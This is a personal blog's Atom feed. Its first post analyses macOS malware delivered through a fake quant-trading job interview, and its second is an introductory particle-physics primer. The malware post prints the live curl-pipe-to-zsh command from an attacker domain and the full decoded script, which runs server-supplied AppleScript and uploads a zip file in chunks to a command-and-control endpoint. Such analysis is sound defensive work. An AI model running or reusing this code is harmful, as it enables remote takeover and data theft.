<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://fotisgiasemis.com/feed.xml" rel="self" type="application/atom+xml" /><link href="https://fotisgiasemis.com/" rel="alternate" type="text/html" /><updated>2026-03-06T15:34:04+01:00</updated><id>https://fotisgiasemis.com/feed.xml</id><title type="html">Fotis I. Giasemis</title><subtitle>Personal page of Fotis Giasemis: Quantitative Researcher, Marie Curie PhD Fellow on Machine Learning at CERN, with a background in Theoretical Physics from Oxford.</subtitle><author><name> </name></author><entry><title type="html">A Fake Quant Interview Tried to Hack My Mac – So I Reverse Engineered the Malware They Sent Me</title><link href="https://fotisgiasemis.com/blog/fake-quant-interview-malware/" rel="alternate" type="text/html" title="A Fake Quant Interview Tried to Hack My Mac – So I Reverse Engineered the Malware They Sent Me" /><published>2026-03-06T00:00:00+01:00</published><updated>2026-03-06T00:00:00+01:00</updated><id>https://fotisgiasemis.com/blog/fake-quant-interview-malware</id><content type="html" xml:base="https://fotisgiasemis.com/blog/fake-quant-interview-malware/"><![CDATA[<p>A LinkedIn quant interview required me to run a <code class="language-plaintext highlighter-rouge">curl | zsh</code> command.</p>

<p>Instead, I reverse engineered the payload and discovered macOS malware.</p>

<p><img src="/assets/fake-interview-malware/thumbnail.png" alt="thumbnail" /></p>

<p>In the era of Generative AI, <strong>social engineering attacks have reached unprecedented levels of sophistication</strong>. Scams are no longer limited to non-technical users: even engineers, quants, and security-aware developers can now be targeted through highly convincing workflows – including fake job interviews. This attack belongs to a growing category of <strong>fake job interview malware</strong> aimed at finance and tech professionals.</p>

<p>Recently, I applied to what looked like a legitimate <strong>quant/algorithmic trading position</strong>. What followed was a surprisingly elaborate attack that ultimately tried to install <strong>macOS malware on my machine</strong>.</p>

<p>Instead of running the installer, I decided to <strong>reverse engineer the payload</strong> to understand exactly what it was doing.</p>

<!--more-->

<h2 id="the-setup">The Setup</h2>

<p>You see a <strong>quant / algorithmic trader job posting on LinkedIn</strong>. Sounds interesting.</p>

<p>You look up the company. The company seems small, but their <strong>website looks legitimate</strong>. There are several associated members on LinkedIn, and the company was allegedly founded in 2018.</p>

<p>Nothing obviously suspicious.</p>

<p>So you apply.</p>

<p>A few days later you receive an email:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
Hi Fotis,

Thank you for applying for the Cryptocurrency Trader
position at [COMPANY REDACTED]. We've had a chance
to review your profile and would love to move forward
with a few quick clarifications.

Could you please let us know:

* Your availability to start
* Whether you're open to remote work
* Your salary expectations
* Your years of experience in this field

Additionally, we'd appreciate a brief sentence or two
on why this role interests you.

Feel free to reply directly to this email - short
answers are perfectly fine.
Looking forward to hearing from you.

Best regards,
[NAME REDACTED]
[COMPANY REDACTED]

</code></pre></div></div>

<p>You reply to the email.</p>

<p>Shortly after, <strong>good news</strong>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
Hi Fotis,

Good news! After reviewing your application for the
Cryptocurrency Trader position at [COMPANY REDACTED],
we're very interested in learning more about you and
potentially moving forward together.

We'd love to hold a meeting with you to discuss the
role in more detail. A calendar invitation has been
sent to you - please choose a time from the available
time slots.

We're really looking forward to meeting you and
learning more about your experience.

Best regards,
[NAME REDACTED]
[COMPANY REDACTED]

</code></pre></div></div>

<h2 id="the-attack">The Attack</h2>

<p>The calendar invitation arrives in a separate email.</p>

<p><img src="/assets/fake-interview-malware/meeting-invitation.png" alt="invitation" /></p>

<p>The meeting link directs you to a platform called <strong>Cozyo</strong>.</p>

<p><img src="/assets/fake-interview-malware/cozyo-1.png" alt="cozyo-1" />
<img src="/assets/fake-interview-malware/cozyo-2.png" alt="cozyo-2" /></p>

<p>The website looks fairly professional. Nothing seems suspicious so far.</p>

<p>So I tried to join the meeting.</p>

<p>That’s when the <strong>first red flag appeared</strong>.</p>

<blockquote>
  <p>You cannot join the interview meeting in the browser. You must download their app.</p>
</blockquote>

<p>Well, some software companies do have their own annoying policies, so this alone is not outrageous. So, let’s download the app for macOS:</p>

<p><img src="/assets/fake-interview-malware/cozyo-3.png" alt="cozyo-3" />
<img src="/assets/fake-interview-malware/cozyo-4.png" alt="cozyo-4" /></p>

<h2 id="the-suspicious-installer">The Suspicious Installer</h2>

<p>Instead of pointing to a normal <code class="language-plaintext highlighter-rouge">.dmg</code> or <code class="language-plaintext highlighter-rouge">.pkg</code> installer, the instructions asked me to run the following <strong>terminal command</strong>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-kfsSL</span> http://parityfinancialgroup.com/curl/bb48f1398db2f86572012201720e941023c1c99781123369a09e463634073fab | zsh
</code></pre></div></div>

<p>At this point the alarm bells started ringing.</p>

<h2 id="why-this-command-is-dangerous">Why This Command Is Dangerous</h2>

<p>Let’s break down what this command does.</p>

<ol>
  <li><code class="language-plaintext highlighter-rouge">curl</code> downloads a script from</li>
</ol>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://parityfinancialgroup.com/...
</code></pre></div></div>

<p>Flags used:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">-k</code> → skip TLS certificate verification (allow an “insecure” connection)</li>
  <li><code class="language-plaintext highlighter-rouge">-f</code> → fail without printing server error pages</li>
  <li><code class="language-plaintext highlighter-rouge">-s</code> → silent mode (no progress output)</li>
  <li><code class="language-plaintext highlighter-rouge">-S</code> → still show errors despite <code class="language-plaintext highlighter-rouge">-s</code></li>
  <li><code class="language-plaintext highlighter-rouge">-L</code> → follow redirects</li>
</ul>

<p>Then the critical part:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>| zsh
</code></pre></div></div>

<p>This <strong>pipes the downloaded content directly into your shell</strong>, meaning the script is <strong>executed immediately without you ever seeing it</strong>.</p>

<p>Effectively the command means:</p>

<blockquote>
  <p>Download unknown code from a random server and execute it immediately.</p>
</blockquote>

<p>That is <strong>one of the most common patterns used by malware installers</strong>.</p>

<p>Even worse, there were several red flags:</p>

<ul>
  <li>Domain <strong>does not match cozyo.app</strong></li>
  <li>Uses <strong>HTTP instead of HTTPS</strong></li>
  <li>Uses <strong><code class="language-plaintext highlighter-rouge">-k</code> to disable TLS certificate verification</strong></li>
  <li>Executes <strong>remote code directly via <code class="language-plaintext highlighter-rouge">| zsh</code></strong></li>
  <li>Uses a <strong>long hash-like URL</strong>, typical for payload loaders</li>
</ul>

<p>At this point I was almost certain the installer was malicious.</p>

<p>Instead of executing it, I downloaded the script and inspected it safely.</p>

<h2 id="inspecting-the-installer-script">Inspecting the Installer Script</h2>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-fsSL</span> http://parityfinancialgroup.com/curl/bb48f1398db2f86572012201720e941023c1c99781123369a09e463634073fab <span class="nt">-o</span> suspicious_script.sh
</code></pre></div></div>

<p>Then inspect it with <code class="language-plaintext highlighter-rouge">cat</code>. Inside we find this:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/zsh</span>
<span class="nv">d10152</span><span class="o">=</span><span class="si">$(</span><span class="nb">base64</span> <span class="nt">-D</span> <span class="o">&lt;&lt;</span><span class="sh">'</span><span class="no">PAYLOAD_m236274904887</span><span class="sh">' | gunzip
...
</span><span class="no">PAYLOAD_m236274904887
</span><span class="si">)</span>
<span class="nb">eval</span> <span class="s2">"</span><span class="nv">$d10152</span><span class="s2">"</span>

</code></pre></div></div>

<p>That script clearly tried to hide the actual intended commands: it’s a so-called <strong>obfuscated loader</strong>.</p>

<p>What is happening here?</p>

<ol>
  <li>A large block of <strong>Base64-encoded data</strong></li>
  <li>That data is <strong>gzip compressed</strong></li>
  <li>The script decodes it</li>
  <li>Then runs it with <code class="language-plaintext highlighter-rouge">eval</code></li>
</ol>

<p>Meaning the <strong>real payload is hidden inside the encoded block</strong>.</p>
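<p>To see how such a loader is put together, here is a harmless reconstruction of the same pattern (my own sketch, not the attacker’s code). The only difference is that we decode the payload to stdout instead of feeding it to <code class="language-plaintext highlighter-rouge">eval</code>:</p>

```shell
# Build a benign "payload" exactly the way the loader does: gzip, then base64.
printf 'echo "this line would have been eval-ed"\n' | gzip | base64 > payload.b64

# Safe inspection: reverse the encoding WITHOUT eval.
# (Older macOS base64 uses -D instead of -d.)
base64 -d < payload.b64 | gunzip
# prints: echo "this line would have been eval-ed"
```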

<h2 id="decoding-the-hidden-payload">Decoding the Hidden Payload</h2>

<p>We can safely decode it <strong>without executing anything</strong>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sed</span> <span class="nt">-n</span> <span class="s1">'/PAYLOAD_/,/PAYLOAD_/p'</span> suspicious_script.sh | <span class="se">\</span>
<span class="nb">sed</span> <span class="s1">'1d;$d'</span> | <span class="se">\</span>
<span class="nb">base64</span> <span class="nt">-D</span> | <span class="nb">gunzip</span> <span class="o">&gt;</span> decoded_script.sh
</code></pre></div></div>

<p>Now inspect the decoded script:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/zsh</span>
daemon_function<span class="o">()</span> <span class="o">{</span>
    <span class="nb">exec</span> &lt;/dev/null
    <span class="nb">exec</span> <span class="o">&gt;</span>/dev/null
    <span class="nb">exec </span>2&gt;/dev/null
    <span class="nb">local </span><span class="nv">domain</span><span class="o">=</span><span class="s2">"parityfinancialgroup.com"</span>
    <span class="nb">local </span><span class="nv">token</span><span class="o">=</span><span class="s2">"bb48f1398db2f86572012201720e941023c1c99781123369a09e463634073fab"</span>
    <span class="nb">local </span><span class="nv">api_key</span><span class="o">=</span><span class="s2">"5190ef1733183a0dc63fb623357f56d6"</span>
    <span class="nb">local </span><span class="nv">file</span><span class="o">=</span><span class="s2">"/tmp/osalogging.zip"</span>
    <span class="k">if</span> <span class="o">[</span> <span class="nv">$# </span><span class="nt">-gt</span> 0 <span class="o">]</span><span class="p">;</span> <span class="k">then
        </span>curl <span class="nt">-k</span> <span class="nt">-s</span> <span class="nt">--max-time</span> 30 <span class="se">\</span>
            <span class="nt">-H</span> <span class="s2">"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"</span> <span class="se">\</span>
            <span class="nt">-H</span> <span class="s2">"api-key: </span><span class="nv">$api_key</span><span class="s2">"</span> <span class="se">\</span>
            <span class="s2">"http://</span><span class="nv">$domain</span><span class="s2">/dynamic?txd=</span><span class="nv">$token</span><span class="s2">&amp;pwd=</span><span class="nv">$1</span><span class="s2">"</span> | osascript
    <span class="k">else
        </span>curl <span class="nt">-k</span> <span class="nt">-s</span> <span class="nt">--max-time</span> 30 <span class="se">\</span>
            <span class="nt">-H</span> <span class="s2">"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"</span> <span class="se">\</span>
            <span class="nt">-H</span> <span class="s2">"api-key: </span><span class="nv">$api_key</span><span class="s2">"</span> <span class="se">\</span>
            <span class="s2">"http://</span><span class="nv">$domain</span><span class="s2">/dynamic?txd=</span><span class="nv">$token</span><span class="s2">"</span> | osascript
    <span class="k">fi
    if</span> <span class="o">[</span> <span class="nv">$?</span> <span class="nt">-ne</span> 0 <span class="o">]</span><span class="p">;</span> <span class="k">then
        </span><span class="nb">exit </span>1
    <span class="k">fi
    if</span> <span class="o">[[</span> <span class="o">!</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span> <span class="o">||</span> <span class="o">!</span> <span class="nt">-s</span> <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then
        return </span>1
    <span class="k">fi
    </span><span class="nb">local </span><span class="nv">CHUNK_SIZE</span><span class="o">=</span><span class="k">$((</span><span class="m">10</span> <span class="o">*</span> <span class="m">1024</span> <span class="o">*</span> <span class="m">1024</span><span class="k">))</span>
    <span class="nb">local </span><span class="nv">MAX_RETRIES</span><span class="o">=</span>8
    <span class="nb">local </span><span class="nv">upload_id</span><span class="o">=</span><span class="si">$(</span><span class="nb">date</span> +%s<span class="si">)</span>-<span class="si">$(</span>openssl rand <span class="nt">-hex</span> 8 2&gt;/dev/null <span class="o">||</span> <span class="nb">echo</span> <span class="nv">$RANDOM$RANDOM</span><span class="si">)</span>
    <span class="nb">local </span>total_size
    <span class="nv">total_size</span><span class="o">=</span><span class="si">$(</span><span class="nb">stat</span> <span class="nt">-f</span> %z <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span> 2&gt;/dev/null <span class="o">||</span> <span class="nb">stat</span> <span class="nt">-c</span> %s <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span><span class="si">)</span>
    <span class="k">if</span> <span class="o">[[</span> <span class="nt">-z</span> <span class="s2">"</span><span class="nv">$total_size</span><span class="s2">"</span> <span class="o">||</span> <span class="s2">"</span><span class="nv">$total_size</span><span class="s2">"</span> <span class="nt">-eq</span> 0 <span class="o">]]</span><span class="p">;</span> <span class="k">then
        return </span>1
    <span class="k">fi
    </span><span class="nb">local </span><span class="nv">total_chunks</span><span class="o">=</span><span class="k">$((</span> <span class="o">(</span>total_size <span class="o">+</span> CHUNK_SIZE <span class="o">-</span> <span class="m">1</span><span class="o">)</span> <span class="o">/</span> CHUNK_SIZE <span class="k">))</span>
    <span class="nb">local </span><span class="nv">i</span><span class="o">=</span>0
    <span class="k">while</span> <span class="o">((</span> i &lt; total_chunks <span class="o">))</span><span class="p">;</span> <span class="k">do
        </span><span class="nb">local </span><span class="nv">offset</span><span class="o">=</span><span class="k">$((</span>i <span class="o">*</span> CHUNK_SIZE<span class="k">))</span>
        <span class="nb">local </span><span class="nv">chunk_size</span><span class="o">=</span><span class="nv">$CHUNK_SIZE</span>
        <span class="o">((</span> offset + chunk_size <span class="o">&gt;</span> total_size <span class="o">))</span> <span class="o">&amp;&amp;</span> <span class="nv">chunk_size</span><span class="o">=</span><span class="k">$((</span>total_size <span class="o">-</span> offset<span class="k">))</span>
        <span class="nb">local </span><span class="nv">success</span><span class="o">=</span>0
        <span class="nb">local </span><span class="nv">attempt</span><span class="o">=</span>1
        <span class="k">while</span> <span class="o">((</span> attempt &lt;<span class="o">=</span> MAX_RETRIES <span class="o">&amp;&amp;</span> success <span class="o">==</span> 0 <span class="o">))</span><span class="p">;</span> <span class="k">do
            </span><span class="nv">http_code</span><span class="o">=</span><span class="si">$(</span><span class="nb">dd </span><span class="k">if</span><span class="o">=</span><span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span> <span class="nv">bs</span><span class="o">=</span>1 <span class="nv">skip</span><span class="o">=</span><span class="nv">$offset</span> <span class="nv">count</span><span class="o">=</span><span class="nv">$chunk_size</span> 2&gt;/dev/null | <span class="se">\</span>
                curl <span class="nt">-k</span> <span class="nt">-s</span> <span class="nt">-X</span> PUT <span class="se">\</span>
                <span class="nt">--data-binary</span> @- <span class="se">\</span>
                <span class="nt">-H</span> <span class="s2">"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"</span> <span class="se">\</span>
                <span class="nt">-H</span> <span class="s2">"api-key: </span><span class="nv">$api_key</span><span class="s2">"</span> <span class="se">\</span>
                <span class="nt">--max-time</span> 180 <span class="se">\</span>
                <span class="nt">-o</span> /dev/null <span class="se">\</span>
                <span class="nt">-w</span> <span class="s2">"%{http_code}"</span> <span class="se">\</span>
                <span class="s2">"http://</span><span class="nv">$domain</span><span class="s2">/gate?buildtxd=</span><span class="nv">$token</span><span class="s2">&amp;upload_id=</span><span class="nv">$upload_id</span><span class="s2">&amp;chunk_index=</span><span class="nv">$i</span><span class="s2">&amp;total_chunks=</span><span class="nv">$total_chunks</span><span class="s2">"</span> 2&gt;/dev/null<span class="si">)</span>
            <span class="nv">curl_status</span><span class="o">=</span><span class="nv">$?</span>
            <span class="k">if</span> <span class="o">[[</span> <span class="nv">$curl_status</span> <span class="nt">-eq</span> 0 <span class="o">&amp;&amp;</span> <span class="nv">$http_code</span> <span class="nt">-ge</span> 200 <span class="o">&amp;&amp;</span> <span class="nv">$http_code</span> <span class="nt">-lt</span> 300 <span class="o">]]</span><span class="p">;</span> <span class="k">then
                </span><span class="nv">success</span><span class="o">=</span>1
            <span class="k">else</span>
                <span class="o">((</span>attempt++<span class="o">))</span>
                <span class="nb">sleep</span> <span class="k">$((</span><span class="m">3</span> <span class="o">+</span> attempt <span class="o">*</span> <span class="m">2</span><span class="k">))</span>
            <span class="k">fi
        done
        if</span> <span class="o">((</span> success <span class="o">==</span> 0 <span class="o">))</span><span class="p">;</span> <span class="k">then
            return </span>1
        <span class="k">fi</span>
        <span class="o">((</span>i++<span class="o">))</span>
    <span class="k">done
    </span><span class="nb">rm</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span>
    <span class="k">return </span>0
<span class="o">}</span>
<span class="k">if </span>daemon_function <span class="s2">"</span><span class="nv">$@</span><span class="s2">"</span> &amp; <span class="k">then
    </span><span class="nb">exit </span>0
<span class="k">else
    </span><span class="nb">exit </span>1
<span class="k">fi</span>
</code></pre></div></div>

<p>This reveals the actual malware logic.</p>

<h2 id="what-the-malware-actually-does">What the Malware Actually Does</h2>

<p>The script defines a function:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>daemon_function<span class="o">()</span> <span class="o">{</span> ... <span class="o">}</span>
</code></pre></div></div>

<p>Then launches it in the background:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>daemon_function <span class="s2">"</span><span class="nv">$@</span><span class="s2">"</span> &amp;
</code></pre></div></div>

<p>Meaning it tries to <strong>run silently as a background process</strong>.</p>

<h3 id="step-1--hide-execution">Step 1 — Hide Execution</h3>

<p>The first lines redirect all I/O to <code class="language-plaintext highlighter-rouge">/dev/null</code>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">exec</span> &lt;/dev/null
<span class="nb">exec</span> <span class="o">&gt;</span>/dev/null
<span class="nb">exec </span>2&gt;/dev/null
</code></pre></div></div>

<p>This ensures:</p>

<ul>
  <li>no terminal output</li>
  <li>no visible errors</li>
  <li>no trace for the user</li>
</ul>

<p>A <strong>classic stealth technique</strong>.</p>
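<p>The effect is easy to verify with a harmless snippet (shown with <code class="language-plaintext highlighter-rouge">sh</code> for portability; the malware does the same in zsh): once the descriptors are redirected, neither output nor errors ever reach the terminal.</p>

```shell
# Everything after the exec redirections is invisible to the user.
sh -c '
  exec >/dev/null 2>&1
  echo "you will never see this"
  ls /definitely/not/a/path    # even the error message is swallowed
'
```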

<h3 id="step-2--contact-command-and-control-server">Step 2 — Contact Command-and-Control Server</h3>

<p>The script defines:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">domain</span><span class="o">=</span><span class="s2">"parityfinancialgroup.com"</span>
<span class="nv">token</span><span class="o">=</span><span class="s2">"bb48f1398db2..."</span>
<span class="nv">api_key</span><span class="o">=</span><span class="s2">"5190ef1733..."</span>
<span class="nv">file</span><span class="o">=</span><span class="s2">"/tmp/osalogging.zip"</span>
</code></pre></div></div>

<p>Then executes:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl ... <span class="s2">"http://</span><span class="nv">$domain</span><span class="s2">/dynamic?txd=</span><span class="nv">$token</span><span class="s2">"</span> | osascript
</code></pre></div></div>

<p>This is the most dangerous line.</p>

<p><code class="language-plaintext highlighter-rouge">osascript</code> executes <strong>AppleScript commands</strong>.</p>

<p>So whatever the server returns is <strong>executed directly on the system</strong>.</p>

<p>That effectively gives the attacker <strong>remote code execution</strong>.</p>

<p>Possible actions include:</p>

<ul>
  <li>accessing local files</li>
  <li>requesting system permissions</li>
  <li>running shell commands</li>
  <li>downloading additional payloads</li>
  <li>interacting with macOS dialogs</li>
</ul>
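<p>The danger of the <code class="language-plaintext highlighter-rouge">| osascript</code> stage is the pattern itself: whatever text the server chooses to return is handed straight to an interpreter. A harmless local simulation of that pattern, with <code class="language-plaintext highlighter-rouge">sh</code> standing in for <code class="language-plaintext highlighter-rouge">osascript</code> and <code class="language-plaintext highlighter-rouge">printf</code> standing in for the server:</p>

```shell
# In the real attack, the left-hand side of this pipe is attacker-controlled.
printf 'echo "attacker-chosen code just ran on this machine"\n' | sh
# prints: attacker-chosen code just ran on this machine
```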

<h3 id="step-3--data-exfiltration">Step 3 — Data Exfiltration</h3>

<p>The script then checks for a file:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/tmp/osalogging.zip
</code></pre></div></div>

<p>If present, it uploads it to the attacker server.</p>

<p>The file is:</p>

<ul>
  <li>split into <strong>10 MB chunks</strong></li>
  <li>uploaded via HTTP <code class="language-plaintext highlighter-rouge">PUT</code> requests</li>
</ul>

<p>Example:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-X</span> PUT http://parityfinancialgroup.com/gate ...
</code></pre></div></div>

<p>This is typical <strong>data exfiltration malware behavior</strong>.</p>

<p>The workflow becomes clear:</p>

<ol>
  <li>Receive commands from attacker server</li>
  <li>Execute them via AppleScript</li>
  <li>Collect local data</li>
  <li>Upload it back in chunks</li>
</ol>
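<p>The chunking arithmetic from the decoded script can be reproduced harmlessly on dummy data (chunk size shrunk from 10 MB to 1 KB for the demo; I also flipped the <code class="language-plaintext highlighter-rouge">stat</code> fallback order so the snippet runs on Linux as well):</p>

```shell
# Same ceiling division and dd offset logic as the malware, on a throwaway file.
file=/tmp/demo.bin
CHUNK_SIZE=1024
head -c 2500 /dev/zero > "$file"

total_size=$(stat -c %s "$file" 2>/dev/null || stat -f %z "$file")
total_chunks=$(( (total_size + CHUNK_SIZE - 1) / CHUNK_SIZE ))
echo "size=$total_size -> $total_chunks chunks"

# The final chunk comes up short, exactly as the script's chunk_size cap handles it:
dd if="$file" bs=1 skip=$((2 * CHUNK_SIZE)) count=$CHUNK_SIZE 2>/dev/null | wc -c
```

<p>For 2500 bytes and 1024-byte chunks this gives 3 chunks, the last one only 452 bytes long.</p>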

<h2 id="lessons-learned">Lessons Learned</h2>

<p>This attack demonstrates how far <strong>social-engineering campaigns</strong> have evolved. It is also reminiscent of the recent attacks on VS Code and GitHub Copilot users, which used prompt injection and other techniques to exploit agentic AI capabilities, letting Copilot interact directly with the developer’s system and external tools.</p>

<p>The entire workflow was convincing:</p>

<ul>
  <li>legitimate-looking job posting</li>
  <li>realistic company website</li>
  <li>LinkedIn presence</li>
  <li>professional email communication</li>
  <li>custom meeting platform</li>
</ul>

<p>The only real red flag appeared at the <strong>installation step</strong>.</p>

<p>Some important takeaways:</p>

<ol>
  <li><strong>Never run <code class="language-plaintext highlighter-rouge">curl | bash</code> or <code class="language-plaintext highlighter-rouge">curl | zsh</code> blindly.</strong></li>
  <li>Legitimate interview software should <strong>never require terminal commands to install</strong>.</li>
  <li>Always verify domains and download sources.</li>
  <li>If something feels unusual in a hiring process, <strong>stop and inspect first</strong>.</li>
</ol>
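<p>If you ever do need to evaluate such an installer, the minimum safe habit is to separate the download from the execution (a sketch; the URL here is a placeholder, not a real endpoint):</p>

```shell
# Save to disk first; never pipe straight into a shell.
curl -fsSL "https://example.com/install.sh" -o install.sh

cat install.sh             # read every line before deciding
shasum -a 256 install.sh   # compare against a checksum published out of band, if any
```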

<p>One careless command would have given the attacker <strong>remote control of the machine and a channel for data exfiltration</strong>.</p>

<h2 id="aftermath">Aftermath</h2>

<p>A few days later, I received this follow-up email:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Hi Fotis,

We noticed you weren't able to join our scheduled 
meeting for the Cryptocurrency Trader role at 
[COMPANY REDACTED].

No worries - we understand things come up. Could 
you let us know what happened?

If you're still interested, you can reschedule 
here: [URL REDACTED]

Just reply to this email and let us know.

Best,
[COMPANY REDACTED]
</code></pre></div></div>

<p>Needless to say, I did not join the meeting.</p>]]></content><author><name> </name></author><category term="Blog" /><category term="Quant" /><category term="Crypto" /><category term="Cybersecurity" /><summary type="html"><![CDATA[I applied to a quant trading job on LinkedIn and was invited to an interview. The meeting software required a suspicious curl command that turned out to be macOS malware. I reverse engineered the payload to see what it actually did.]]></summary></entry><entry><title type="html">Accelerator and Heavy Flavor Physics – Introductory Concepts</title><link href="https://fotisgiasemis.com/blog/accelerator-heavy-flavor-physics/" rel="alternate" type="text/html" title="Accelerator and Heavy Flavor Physics – Introductory Concepts" /><published>2025-12-06T00:00:00+01:00</published><updated>2025-12-06T00:00:00+01:00</updated><id>https://fotisgiasemis.com/blog/accelerator-heavy-flavor-physics</id><content type="html" xml:base="https://fotisgiasemis.com/blog/accelerator-heavy-flavor-physics/"><![CDATA[<h2 id="introduction">Introduction</h2>

<p>In this post, we delve into the primary field of focus of this text: high-energy particle physics. We begin by introducing fundamental concepts in accelerator physics, followed by an overview of the Standard Model (SM) and some key open questions in the field. Finally, we touch on heavy flavor physics in a bit more detail. This background will be necessary to understand and precisely describe the work from the physics point of view.</p>

<h2 id="accelerator-physics">Accelerator Physics</h2>

<h3 id="cylindrical-coordinates">Cylindrical Coordinates</h3>

<p>In accelerator physics, cylindrical coordinates \((\rho, \varphi, z)\) <a href="https://books.google.gr/books/about/Mathematical_Methods_for_Physics_and_Eng.html?id=Mq1nlEKhNcsC&amp;redir_esc=y">[Ref]</a> are often used instead of Cartesian coordinates \((x,y,z)\). In this configuration, points are identified with respect to a main axis, called the cylindrical or longitudinal axis, and an auxiliary axis, called the polar axis, as shown in Fig. 1. \(\rho\) denotes the perpendicular distance from the main axis, \(z\) denotes the distance along the main axis, and \(\varphi\) is the plane (or azimuthal) angle of the projection of the point onto the transverse plane. The beamline is naturally identified with the cylindrical axis of the coordinate system.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/cylindrical.png" alt="cylindrical" /></p>

<p><strong>Figure 1:</strong> A cylindrical coordinate system defined by an origin \(O\), a polar (radial) axis \(A\), and a longitudinal (axial) axis \(L\). Figure from <a href="https://commons.wikimedia.org/wiki/File:Coord_system_CY_1.svg">[Ref]</a>.</p>

<h3 id="pseudorapidity">Pseudorapidity</h3>

<p>In experimental particle physics, another frequently used spatial coordinate is the pseudorapidity \(\eta\). It describes the angle between a particle’s momentum \(\mathbf{p}\) and the positive direction of the beam axis—identified with the \(z\)-direction. This angle is referred to as the polar angle \(\theta\), as shown in Fig. 2.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/angles.png" alt="angles" /></p>

<p><strong>Figure 2:</strong> The polar (\(\theta\)) and azimuthal (\(\varphi\)) angles. Adapted from <a href="https://tikz.net/axis3d/">[Ref]</a>.</p>

<p>Pseudorapidity is defined as <a href="https://books.google.gr/books/about/Introduction_to_High_energy_Heavy_ion_Co.html?id=Fnxvrdj2NOQC&amp;redir_esc=y">[Ref]</a>:</p>

<p>\[
    \eta = - \ln \left[ \tan \left( \frac{\theta}{2} \right) \right]\,,
\]
or inversely</p>

<p>\[
    \theta = 2 \arctan \left( e^{-\eta}\right) \,.
\]
As a function of the three-momentum \(\mathbf{p}\), pseudorapidity can be expressed as</p>

<p>\[
    \eta = \frac{1}{2} \ln \left( \frac{|\mathbf{p}| + p_L}{|\mathbf{p}| - p_L} \right)\,
\]
where \(p_L\) is the longitudinal component of the momentum, along the beam axis. Due to its desirable physical properties, this definition is highly favored in experimental particle physics.</p>

<p>From the above equation, we can see that when the momentum is almost entirely along the beamline, i.e., \(p_L \rightarrow \lvert \mathbf{p} \rvert \) (\(\theta \rightarrow 0 \)), pseudorapidity diverges, \(\eta \rightarrow \infty \). On the other hand, when most of the momentum is in transverse directions, \(p_L \rightarrow 0 \) (\(\theta \rightarrow 90^{\circ} \)), then \(\eta \rightarrow 0 \), as shown in Fig. 3.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/pseudorapidity.png" alt="pseudorapidity" /></p>

<p><strong>Figure 3:</strong> Values of pseudorapidity \(\eta\) versus polar angle \(\theta\). Figure from <a href="https://tikz.net/axis2d_pseudorapidity/">[Ref]</a>.</p>
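<p>These limits are easy to check numerically with a throwaway <code class="language-plaintext highlighter-rouge">awk</code> one-liner (my own sanity check, not from any analysis framework):</p>

```shell
# eta(theta) = -ln(tan(theta/2)), with theta given in degrees.
awk 'BEGIN {
  pi = atan2(0, -1)
  for (deg = 10; deg <= 90; deg += 40) {
    th  = deg * pi / 180
    eta = -log(sin(th/2) / cos(th/2))   # awk has no tan(), so use sin/cos
    printf "theta = %2d deg  ->  eta = %.3f\n", deg, eta
  }
}'
```

<p>For \(\theta = 10^{\circ}\) this gives \(\eta \approx 2.44\), and for \(\theta = 90^{\circ}\) it gives \(\eta \approx 0\), consistent with Fig. 3.</p>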

<h3 id="beam-bunching">Beam Bunching</h3>

<p>In many modern experiments, including the LHC, the particles in a beam are grouped into pulses, or <em>bunches</em>. Bunched beams are common because most modern accelerators require bunching for acceleration <a href="https://www.osti.gov/biblio/5675075">[Ref]</a>.</p>

<p>At the LHC, after accelerating the particles in bunches, the two beams are focused resulting in the crossing of these bunches—the so-called <em>bunch crossing</em>, as shown in Fig. 4. These bunch crossings, also known as <em>events</em>, may result in one or multiple collisions between protons and consequently in the production of new particles. The number of these collisions during a bunch crossing is known as pile-up.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/bunches.png" alt="bunches" /></p>

<p><strong>Figure 4:</strong> Illustration of beam bunching utilized at the Large Hadron Collider at CERN. Adapted from <a href="https://naturphilosophie.co.uk/physics-13-tev-cranking-lhc/">[Ref]</a>.</p>

